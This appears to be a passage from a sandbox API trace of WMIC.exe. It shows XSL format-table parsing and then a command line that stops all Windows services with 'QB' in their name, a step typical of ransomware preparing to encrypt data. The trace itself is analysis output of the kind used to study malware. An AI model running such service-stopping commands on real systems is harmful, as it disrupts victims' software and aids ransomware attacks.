0x2c8ab28 [0314.283] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2e39fa8, name="KEYWORD", namedItem=0x2b0f890 | out: namedItem=0x2b0f890*=0x2e39ff8) returned 0x0 [0314.283] free (_Block=0x2c8ab28) [0314.283] IXMLDOMNode:get_nodeValue (in: This=0x2e39ff8, value=0x2b0f850 | out: value=0x2b0f850*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x0)) returned 0x0 [0314.283] malloc (_Size=0xc) returned 0x2c8ad50 [0314.283] malloc (_Size=0xc) returned 0x2c8acd8 [0314.283] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0314.283] SysStringLen (param_1="TABLE") returned 0x5 [0314.283] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0314.284] SysStringLen (param_1="XML") returned 0x3 [0314.284] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0314.284] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0314.284] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0314.284] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0314.284] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0314.284] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0314.284] malloc (_Size=0x18) returned 0x2c82bd0 [0314.284] IUnknown:Release (This=0x2e36b88) returned 0x0 [0314.284] IUnknown:Release (This=0x2e39fa8) returned 0x0 [0314.284] IUnknown:Release (This=0x2e39ff8) returned 0x0 [0314.284] IXMLDOMNodeList:get_item (in: This=0x2e39ca0, index=13, listItem=0x2b0f898 | out: listItem=0x2b0f898*=0x2e36b88) returned 0x0 [0314.284] IXMLDOMNode:get_text (in: This=0x2e36b88, text=0x2b0f89c | out: text=0x2b0f89c*="texttable.xsl") returned 0x0 [0314.284] IXMLDOMNode:get_attributes (in: This=0x2e36b88, attributeMap=0x2b0f894 | out: attributeMap=0x2b0f894*=0x2e39fa8) returned 0x0 [0314.284] malloc (_Size=0xc) returned 0x2c8ab88 [0314.284] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2e39fa8, name="KEYWORD", namedItem=0x2b0f890 | out: namedItem=0x2b0f890*=0x2e39ff8) returned 0x0 [0314.284] free (_Block=0x2c8ab88) [0314.284] IXMLDOMNode:get_nodeValue (in: This=0x2e39ff8, value=0x2b0f850 | out: value=0x2b0f850*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x0)) returned 0x0 [0314.285] malloc (_Size=0xc) returned 0x2c8ab28 [0314.285] malloc (_Size=0xc) returned 0x2c8aba0 [0314.285] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0314.285] SysStringLen (param_1="TABLE") returned 0x5 [0314.285] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0314.285] SysStringLen (param_1="XML") returned 0x3 [0314.285] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0314.285] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0314.285] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0314.285] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0314.285] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0314.285] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0314.285] malloc (_Size=0x18) returned 0x2c829b0 [0314.285] IUnknown:Release (This=0x2e36b88) returned 0x0 [0314.285] IUnknown:Release (This=0x2e39fa8) returned 0x0 [0314.285] IUnknown:Release (This=0x2e39ff8) returned 0x0 [0314.285] IXMLDOMNodeList:get_item (in: This=0x2e39ca0, index=14, listItem=0x2b0f898 | out: listItem=0x2b0f898*=0x2e36b88) returned 0x0 [0314.285] IXMLDOMNode:get_text (in: This=0x2e36b88, text=0x2b0f89c | out: text=0x2b0f89c*="texttable.xsl") returned 0x0 [0314.285] IXMLDOMNode:get_attributes (in: This=0x2e36b88, attributeMap=0x2b0f894 | out: attributeMap=0x2b0f894*=0x2e39fa8) returned 0x0 [0314.285] malloc (_Size=0xc) returned 0x2c8ad80 [0314.285] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2e39fa8, name="KEYWORD", namedItem=0x2b0f890 | out: namedItem=0x2b0f890*=0x2e39ff8) returned 0x0 [0314.286] free (_Block=0x2c8ad80) [0314.286] IXMLDOMNode:get_nodeValue (in: This=0x2e39ff8, value=0x2b0f850 | out: value=0x2b0f850*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x0)) returned 0x0 [0314.286] malloc (_Size=0xc) returned 0x2c8aca8 [0314.286] malloc (_Size=0xc) returned 0x2c8acf0 [0314.286] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0314.286] SysStringLen (param_1="TABLE") returned 0x5 [0314.286] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0314.286] SysStringLen (param_1="XML") returned 0x3 [0314.286] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0314.286] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0314.286] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0314.286] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0314.286] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0314.286] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0314.286] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0314.286] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0314.286] malloc (_Size=0x18) returned 0x2c82bf0 [0314.286] IUnknown:Release (This=0x2e36b88) returned 0x0 [0314.286] IUnknown:Release (This=0x2e39fa8) returned 0x0 [0314.286] IUnknown:Release (This=0x2e39ff8) returned 0x0 [0314.286] IXMLDOMNodeList:get_item (in: This=0x2e39ca0, index=15, listItem=0x2b0f898 | out: listItem=0x2b0f898*=0x2e36b88) returned 0x0 [0314.286] IXMLDOMNode:get_text (in: This=0x2e36b88, text=0x2b0f89c | out: text=0x2b0f89c*="htable.xsl") returned 0x0 [0314.287] IXMLDOMNode:get_attributes (in: This=0x2e36b88, attributeMap=0x2b0f894 | out: attributeMap=0x2b0f894*=0x2e39fa8) returned 0x0 [0314.287] malloc (_Size=0xc) returned 0x2c8ad80 [0314.287] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2e39fa8, name="KEYWORD", namedItem=0x2b0f890 | out: namedItem=0x2b0f890*=0x2e39ff8) returned 0x0 [0314.287] free (_Block=0x2c8ad80) [0314.287] IXMLDOMNode:get_nodeValue (in: This=0x2e39ff8, value=0x2b0f850 | out: value=0x2b0f850*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x0)) returned 0x0 [0314.287] malloc (_Size=0xc) returned 0x2c8ac30 [0314.287] malloc (_Size=0xc) returned 0x2c8ad08 [0314.287] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0314.287] SysStringLen (param_1="TABLE") returned 0x5 [0314.287] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0314.287] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0314.287] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0314.287] SysStringLen (param_1="XML") returned 0x3 [0314.287] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0314.287] SysStringLen (param_1="texttablewsys") returned 0xd [0314.287] SysStringLen (param_1="XML") returned 0x3 [0314.287] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0314.287] malloc (_Size=0x18) returned 0x2c82c10 [0314.287] IUnknown:Release (This=0x2e36b88) returned 0x0 [0314.288] IUnknown:Release (This=0x2e39fa8) returned 0x0 [0314.288] IUnknown:Release (This=0x2e39ff8) returned 0x0 [0314.288] IXMLDOMNodeList:get_item (in: This=0x2e39ca0, index=16, listItem=0x2b0f898 | out: listItem=0x2b0f898*=0x2e36b88) returned 0x0 [0314.289] IXMLDOMNode:get_text (in: This=0x2e36b88, text=0x2b0f89c | out: text=0x2b0f89c*="htable.xsl") returned 0x0 [0314.289] IXMLDOMNode:get_attributes (in: This=0x2e36b88, attributeMap=0x2b0f894 | out: attributeMap=0x2b0f894*=0x2e39fa8) returned 0x0 [0314.289] malloc (_Size=0xc) returned 0x2c8ac48 [0314.289] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2e39fa8, name="KEYWORD", namedItem=0x2b0f890 | out: namedItem=0x2b0f890*=0x2e39ff8) returned 0x0 [0314.289] free (_Block=0x2c8ac48) [0314.289] IXMLDOMNode:get_nodeValue (in: This=0x2e39ff8, value=0x2b0f850 | out: value=0x2b0f850*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x0)) returned 0x0 [0314.289] malloc (_Size=0xc) returned 0x2c8abd0 [0314.289] malloc (_Size=0xc) returned 0x2c8ad38 [0314.289] SysStringLen (param_1="htable-sortby") returned 0xd [0314.289] SysStringLen (param_1="TABLE") returned 0x5 [0314.289] SysStringLen (param_1="htable-sortby") returned 0xd [0314.289] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0314.289] SysStringLen (param_1="htable-sortby") returned 0xd [0314.289] SysStringLen (param_1="XML") returned 0x3 [0314.289] SysStringLen (param_1="htable-sortby") returned 0xd [0314.289] SysStringLen (param_1="texttablewsys") returned 0xd [0314.289] SysStringLen (param_1="htable-sortby") returned 0xd [0314.290] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0314.290] SysStringLen (param_1="XML") returned 0x3 [0314.290] SysStringLen (param_1="htable-sortby") returned 0xd [0314.290] malloc (_Size=0x18) returned 0x2c82c90 [0314.290] IUnknown:Release (This=0x2e36b88) returned 0x0 [0314.290] IUnknown:Release (This=0x2e39fa8) returned 0x0 [0314.290] IUnknown:Release (This=0x2e39ff8) returned 0x0 [0314.290] IXMLDOMNodeList:get_item (in: This=0x2e39ca0, index=17, listItem=0x2b0f898 | out: listItem=0x2b0f898*=0x2e36b88) returned 0x0 [0314.290] IXMLDOMNode:get_text (in: This=0x2e36b88, text=0x2b0f89c | out: text=0x2b0f89c*="mof.xsl") returned 0x0 [0314.290] IXMLDOMNode:get_attributes (in: This=0x2e36b88, attributeMap=0x2b0f894 | out: attributeMap=0x2b0f894*=0x2e39fa8) returned 0x0 [0314.290] malloc (_Size=0xc) returned 0x2c8abe8 [0314.290] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2e39fa8, name="KEYWORD", namedItem=0x2b0f890 | out: namedItem=0x2b0f890*=0x2e39ff8) returned 0x0 [0314.290] free (_Block=0x2c8abe8) [0314.290] IXMLDOMNode:get_nodeValue (in: This=0x2e39ff8, value=0x2b0f850 | out: value=0x2b0f850*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x0)) returned 0x0 [0314.290] malloc (_Size=0xc) returned 0x2c8ac48 [0314.290] malloc (_Size=0xc) returned 0x2c8ad20 [0314.290] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0314.290] SysStringLen (param_1="TABLE") returned 0x5 [0314.291] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0314.291] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0314.291] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0314.291] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0314.291] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0314.291] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0314.291] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0314.291] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0314.291] malloc (_Size=0x18) returned 0x2c82c50 [0314.291] IUnknown:Release (This=0x2e36b88) returned 0x0 [0314.291] IUnknown:Release (This=0x2e39fa8) returned 0x0 [0314.291] IUnknown:Release (This=0x2e39ff8) returned 0x0 [0314.291] IXMLDOMNodeList:get_item (in: This=0x2e39ca0, index=18, listItem=0x2b0f898 | out: listItem=0x2b0f898*=0x2e36b88) returned 0x0 [0314.291] IXMLDOMNode:get_text (in: This=0x2e36b88, text=0x2b0f89c | out: text=0x2b0f89c*="mof.xsl") returned 0x0 [0314.291] IXMLDOMNode:get_attributes (in: This=0x2e36b88, attributeMap=0x2b0f894 | out: attributeMap=0x2b0f894*=0x2e39fa8) returned 0x0 [0314.291] malloc (_Size=0xc) returned 0x2c8ab88 [0314.291] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2e39fa8, name="KEYWORD", namedItem=0x2b0f890 | out: namedItem=0x2b0f890*=0x2e39ff8) returned 0x0 [0314.291] free (_Block=0x2c8ab88) [0314.291] IXMLDOMNode:get_nodeValue (in: This=0x2e39ff8, value=0x2b0f850 | out: value=0x2b0f850*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x0)) returned 0x0 [0314.291] malloc (_Size=0xc) returned 0x2c8ad68 [0314.292] malloc (_Size=0xc) returned 0x2c8ab40 [0314.292] SysStringLen (param_1="wmiclimofformat") returned 0xf [0314.292] SysStringLen (param_1="TABLE") returned 0x5 [0314.292] SysStringLen (param_1="wmiclimofformat") returned 0xf [0314.292] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0314.292] SysStringLen (param_1="wmiclimofformat") returned 0xf [0314.292] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0314.292] SysStringLen (param_1="wmiclimofformat") returned 0xf [0314.292] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0314.292] SysStringLen (param_1="wmiclimofformat") returned 0xf [0314.292] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0314.292] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0314.292] SysStringLen (param_1="wmiclimofformat") returned 0xf [0314.292] malloc (_Size=0x18) returned 0x2c82c70 [0314.293] IUnknown:Release (This=0x2e36b88) returned 0x0 [0314.293] IUnknown:Release (This=0x2e39fa8) returned 0x0 [0314.293] IUnknown:Release (This=0x2e39ff8) returned 0x0 [0314.293] IXMLDOMNodeList:get_item (in: This=0x2e39ca0, index=19, listItem=0x2b0f898 | out: listItem=0x2b0f898*=0x2e36b88) returned 0x0 [0314.293] IXMLDOMNode:get_text (in: This=0x2e36b88, text=0x2b0f89c | out: text=0x2b0f89c*="textvaluelist.xsl") returned 0x0 [0314.293] IXMLDOMNode:get_attributes (in: This=0x2e36b88, attributeMap=0x2b0f894 | out: attributeMap=0x2b0f894*=0x2e39fa8) returned 0x0 [0314.293] malloc (_Size=0xc) returned 0x2c8abb8 [0314.293] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2e39fa8, name="KEYWORD", namedItem=0x2b0f890 | out: namedItem=0x2b0f890*=0x2e39ff8) returned 0x0 [0314.294] free (_Block=0x2c8abb8) [0314.294] IXMLDOMNode:get_nodeValue (in: This=0x2e39ff8, value=0x2b0f850 | out: value=0x2b0f850*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x0)) returned 0x0 [0314.294] malloc (_Size=0xc) returned 0x2c8ad80 [0314.294] malloc (_Size=0xc) returned 0x2c8abe8 [0314.294] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0314.294] SysStringLen (param_1="TABLE") returned 0x5 [0314.294] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0314.294] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0314.294] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0314.294] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0314.294] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0314.294] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0314.294] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0314.294] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0314.294] malloc (_Size=0x18) returned 0x2c82cb0 [0314.294] IUnknown:Release (This=0x2e36b88) returned 0x0 [0314.294] IUnknown:Release (This=0x2e39fa8) returned 0x0 [0314.294] IUnknown:Release (This=0x2e39ff8) returned 0x0 [0314.294] IXMLDOMNodeList:get_item (in: This=0x2e39ca0, index=20, listItem=0x2b0f898 | out: listItem=0x2b0f898*=0x2e36b88) returned 0x0 [0314.294] IXMLDOMNode:get_text (in: This=0x2e36b88, text=0x2b0f89c | out: text=0x2b0f89c*="textvaluelist.xsl") returned 0x0 [0314.294] IXMLDOMNode:get_attributes (in: This=0x2e36b88, attributeMap=0x2b0f894 | out: attributeMap=0x2b0f894*=0x2e39fa8) returned 0x0 [0314.294] malloc (_Size=0xc) returned 0x2c8adb0 [0314.295] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2e39fa8, name="KEYWORD", namedItem=0x2b0f890 | out: namedItem=0x2b0f890*=0x2e39ff8) returned 0x0 [0314.295] free (_Block=0x2c8adb0) [0314.295] IXMLDOMNode:get_nodeValue (in: This=0x2e39ff8, value=0x2b0f850 | out: value=0x2b0f850*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x0)) returned 0x0 [0314.295] malloc (_Size=0xc) returned 0x2c8adb0 [0314.295] malloc (_Size=0xc) returned 0x2c8adc8 [0314.295] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0314.295] SysStringLen (param_1="TABLE") returned 0x5 [0314.295] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0314.295] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0314.295] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0314.295] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0314.295] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0314.295] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0314.295] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0314.295] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0314.295] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0314.295] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0314.295] malloc (_Size=0x18) returned 0x2c82d10 [0314.295] IUnknown:Release (This=0x2e36b88) returned 0x0 [0314.295] IUnknown:Release (This=0x2e39fa8) returned 0x0 [0314.295] IUnknown:Release (This=0x2e39ff8) returned 0x0 [0314.295] IUnknown:Release (This=0x2e39ca0) returned 0x0 [0314.295] FreeThreadedDOMDocument:IUnknown:Release (This=0x2e36b48) returned 0x1 [0314.295] FreeThreadedDOMDocument:IUnknown:Release (This=0x2e345a8) returned 0x0 [0314.296] free (_Block=0x2c89958) [0314.296] GetCommandLineW () returned="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%QB%%'\" call stopservice" [0314.296] malloc (_Size=0xd0) returned 0x2c8aee8 [0314.296] memcpy_s (in: _Destination=0x2c8aee8, _DestinationSize=0xce, _Source=0x2ea1b78, _SourceSize=0xc4 | out: _Destination=0x2c8aee8) returned 0x0 [0314.296] malloc (_Size=0xc) returned 0x2c8ab58 [0314.296] malloc (_Size=0xc) returned 0x2c8abb8 [0314.296] malloc (_Size=0xc) returned 0x2c8ac60 [0314.296] malloc (_Size=0xc) returned 0x2c8ac78 [0314.296] malloc (_Size=0x80) returned 0x2c8afc0 [0314.296] GetLocalTime (in: lpSystemTime=0x2b0f834 | out: lpSystemTime=0x2b0f834*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x2, wHour=0x8, wMinute=0x1d, wSecond=0x14, wMilliseconds=0x15d)) [0314.296] _vsnwprintf (in: _Buffer=0x2c8afc0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x2b0f814 | out: _Buffer="04-02-2020T08:29:20") returned 19 [0314.296] lstrlenW (lpString=" path Win32_Service where \"name like '%%QB%%'\" call stopservice") returned 63 [0314.296] malloc (_Size=0x80) returned 0x2c8b048 [0314.296] lstrlenW (lpString=" path Win32_Service where \"name like '%%QB%%'\" call stopservice") returned 63 [0314.296] lstrlenW (lpString=" path Win32_Service where \"name like '%%QB%%'\" call stopservice") returned 63 [0314.296] malloc (_Size=0x80) returned 0x2c8b0d0 [0314.296] lstrlenW (lpString=" path Win32_Service where \"name like '%%QB%%'\" call stopservice") returned 63 [0314.296] lstrlenW (lpString=" path Win32_Service where \"name like '%%QB%%'\" call stopservice") returned 63 [0314.296] lstrlenW (lpString=" path Win32_Service where \"name like '%%QB%%'\" call stopservice") returned 63 [0314.296] malloc (_Size=0xa) returned 0x2c8ab70 [0314.297] lstrlenW (lpString="path") returned 4 [0314.297] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0314.297] malloc (_Size=0xa) returned 0x2c8ac90 [0314.297] malloc (_Size=0x4) returned 0x2c82ed8 [0314.297] free (_Block=0x0) [0314.297] free (_Block=0x2c8ab70) [0314.297] lstrlenW (lpString=" path Win32_Service where \"name like '%%QB%%'\" call stopservice") returned 63 [0314.297] malloc (_Size=0x1c) returned 0x2c89da8 [0314.297] lstrlenW (lpString="Win32_Service") returned 13 [0314.297] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0314.297] malloc (_Size=0x1c) returned 0x2c80568 [0314.297] malloc (_Size=0x8) returned 0x2c82ee8 [0314.297] memmove_s (in: _Destination=0x2c82ee8, _DestinationSize=0x4, _Source=0x2c82ed8, _SourceSize=0x4 | out: _Destination=0x2c82ee8) returned 0x0 [0314.297] free (_Block=0x2c82ed8) [0314.297] free (_Block=0x0) [0314.297] free (_Block=0x2c89da8) [0314.297] lstrlenW (lpString=" path Win32_Service where \"name like '%%QB%%'\" call stopservice") returned 63 [0314.297] malloc (_Size=0xc) returned 0x2c8ade0 [0314.297] lstrlenW (lpString="where") returned 5 [0314.297] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0314.297] malloc (_Size=0xc) returned 0x2c8adf8 [0314.297] malloc (_Size=0xc) returned 0x2c8ab70 [0314.297] memmove_s (in: _Destination=0x2c8ab70, _DestinationSize=0x8, _Source=0x2c82ee8, _SourceSize=0x8 | out: _Destination=0x2c8ab70) returned 0x0 [0314.297] free (_Block=0x2c82ee8) [0314.297] free (_Block=0x0) [0314.297] free (_Block=0x2c8ade0) [0314.297] lstrlenW (lpString=" path Win32_Service where \"name like '%%QB%%'\" call stopservice") returned 63 [0314.297] malloc (_Size=0x2a) returned 0x2c8b158 [0314.297] lstrlenW (lpString="\"name like '%%QB%%'\"") returned 20 [0314.297] _wcsicmp (_String1="\"name like '%%QB%%'\"", _String2="\"NULL\"") returned -20 [0314.297] lstrlenW (lpString="\"name like '%%QB%%'\"") returned 20 [0314.297] lstrlenW (lpString="\"name like '%%QB%%'\"") returned 20 [0314.297] malloc (_Size=0x2a) returned 0x2c8b190 [0314.297] malloc (_Size=0x10) returned 0x2c8ade0 [0314.298] memmove_s (in: _Destination=0x2c8ade0, _DestinationSize=0xc, _Source=0x2c8ab70, _SourceSize=0xc | out: _Destination=0x2c8ade0) returned 0x0 [0314.298] free (_Block=0x2c8ab70) [0314.298] free (_Block=0x0) [0314.298] free (_Block=0x2c8b158) [0314.298] lstrlenW (lpString=" path Win32_Service where \"name like '%%QB%%'\" call stopservice") returned 63 [0314.298] malloc (_Size=0xa) returned 0x2c8ab70 [0314.298] lstrlenW (lpString="call") returned 4 [0314.298] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0314.298] malloc (_Size=0xa) returned 0x2c8ab88 [0314.298] malloc (_Size=0x18) returned 0x2c829d0 [0314.298] memmove_s (in: _Destination=0x2c829d0, _DestinationSize=0x10, _Source=0x2c8ade0, _SourceSize=0x10 | out: _Destination=0x2c829d0) returned 0x0 [0314.298] free (_Block=0x2c8ade0) [0314.298] free (_Block=0x0) [0314.298] free (_Block=0x2c8ab70) [0314.298] lstrlenW (lpString=" path Win32_Service where \"name like '%%QB%%'\" call stopservice") returned 63 [0314.298] malloc (_Size=0x18) returned 0x2c829f0 [0314.298] lstrlenW (lpString="stopservice") returned 11 [0314.298] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0314.298] malloc (_Size=0x18) returned 0x2c82a10 [0314.298] free (_Block=0x0) [0314.298] free (_Block=0x2c829f0) [0314.298] malloc (_Size=0x18) returned 0x2c82a50 [0314.298] lstrlenW (lpString="QUIT") returned 4 [0314.298] lstrlenW (lpString="path") returned 4 [0314.298] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0314.298] lstrlenW (lpString="EXIT") returned 4 [0314.298] lstrlenW (lpString="path") returned 4 [0314.298] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0314.298] free (_Block=0x2c82a50) [0314.298] WbemLocator:IUnknown:AddRef (This=0x2ea4748) returned 0x2 [0314.298] malloc (_Size=0x18) returned 0x2c829f0 [0314.298] lstrlenW (lpString="/") returned 1 [0314.298] lstrlenW (lpString="path") returned 4 [0314.298] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0314.298] lstrlenW (lpString="-") returned 1 [0314.299] lstrlenW (lpString="path") returned 4 [0314.299] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0314.299] lstrlenW (lpString="CLASS") returned 5 [0314.299] lstrlenW (lpString="path") returned 4 [0314.299] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0314.299] lstrlenW (lpString="PATH") returned 4 [0314.299] lstrlenW (lpString="path") returned 4 [0314.299] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0314.299] lstrlenW (lpString="/") returned 1 [0314.299] lstrlenW (lpString="Win32_Service") returned 13 [0314.299] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0314.299] lstrlenW (lpString="-") returned 1 [0314.299] lstrlenW (lpString="Win32_Service") returned 13 [0314.299] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0314.299] lstrlenW (lpString="Win32_Service") returned 13 [0314.299] malloc (_Size=0x1c) returned 0x2c89da8 [0314.299] lstrlenW (lpString="Win32_Service") returned 13 [0314.299] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0x47d99b4d | out: _String="Win32_Service", _Context=0x47d99b4d) returned="Win32_Service" [0314.299] lstrlenW (lpString="Win32_Service") returned 13 [0314.299] malloc (_Size=0x1c) returned 0x2c8b158 [0314.299] lstrlenW (lpString="Win32_Service") returned 13 [0314.299] wcstok (in: _String=0x0, _Delimiter=",", _Context=0x47d99b4d | out: _String=0x0, _Context=0x47d99b4d) returned 0x0 [0314.299] lstrlenW (lpString="") returned 0 [0314.299] lstrlenW (lpString="WHERE") returned 5 [0314.299] lstrlenW (lpString="where") returned 5 [0314.299] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0314.300] lstrlenW (lpString="/") returned 1 [0314.300] lstrlenW (lpString="name like '%%QB%%'") returned 18 [0314.300] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%QB%%'", cchCount1=18, lpString2="/", cchCount2=1) returned 3 [0314.300] lstrlenW (lpString="-") returned 1 [0314.300] lstrlenW (lpString="name like '%%QB%%'") returned 18 [0314.300] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%QB%%'", cchCount1=18, lpString2="-", cchCount2=1) returned 3 [0314.300] lstrlenW (lpString="name like '%%QB%%'") returned 18 [0314.300] malloc (_Size=0x26) returned 0x2c8b1c8 [0314.300] lstrlenW (lpString="name like '%%QB%%'") returned 18 [0314.300] lstrlenW (lpString="/") returned 1 [0314.300] lstrlenW (lpString="call") returned 4 [0314.300] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0314.300] lstrlenW (lpString="-") returned 1 [0314.300] lstrlenW (lpString="call") returned 4 [0314.300] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0314.300] lstrlenW (lpString="call") returned 4 [0314.300] malloc (_Size=0xa) returned 0x2c8ade0 [0314.300] lstrlenW (lpString="call") returned 4 [0314.300] lstrlenW (lpString="GET") returned 3 [0314.300] lstrlenW (lpString="call") returned 4 [0314.300] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0314.300] lstrlenW (lpString="LIST") returned 4 [0314.300] lstrlenW (lpString="call") returned 4 [0314.300] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0314.300] lstrlenW (lpString="SET") returned 3 [0314.300] lstrlenW (lpString="call") returned 4 [0314.300] CompareStringW (Locale=0x800, 